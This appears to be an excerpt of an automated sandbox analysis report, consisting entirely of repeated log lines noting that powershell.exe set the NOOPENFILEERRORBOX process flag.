                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
